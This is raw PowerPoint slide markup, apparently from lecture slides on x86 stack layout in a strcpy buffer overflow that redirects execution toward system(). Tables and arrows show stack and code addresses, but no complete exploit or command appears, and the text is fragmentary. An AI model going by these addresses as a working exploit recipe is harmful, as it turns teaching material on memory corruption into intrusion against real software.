            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048440</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff678</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff63c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff640</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff646</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4759901" y="359330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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765141"/>
            <a:ext cx="2831284" cy="93025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 * 50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1080693526"/>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff714</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7f8684c</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e66310</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff85c</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff646</a:t>
                      </a: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333</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="61763" y="138254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0xbffff67c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1377497605"/>
              </p:ext>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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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0xbffff67c</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>804843f</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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>804841d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048423</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048426</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048429</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804842b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804842f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048432</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048435</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804843a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804843f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048440</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff678</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff63c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff640</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff646</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4788817" y="388741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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765141"/>
            <a:ext cx="2831284" cy="93025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 * 50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1271838020"/>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff714</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7f8684c</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e66310</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff85c</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff646</a:t>
                      </a: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334</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="42485" y="100087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0xbffff67c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="292516810"/>
              </p:ext>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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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0xbffff680</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>b7e66310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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>804841d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048423</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048426</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048429</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804842b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804842f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048432</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048435</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804843a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804843f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048440</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff678</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff63c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff640</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff646</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4383301" y="485149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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765141"/>
            <a:ext cx="2831284" cy="93025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 * 50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4738838" y="4486372"/>
            <a:ext cx="6256324" cy="1476243"/>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system</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sub $0x8,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0x10(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
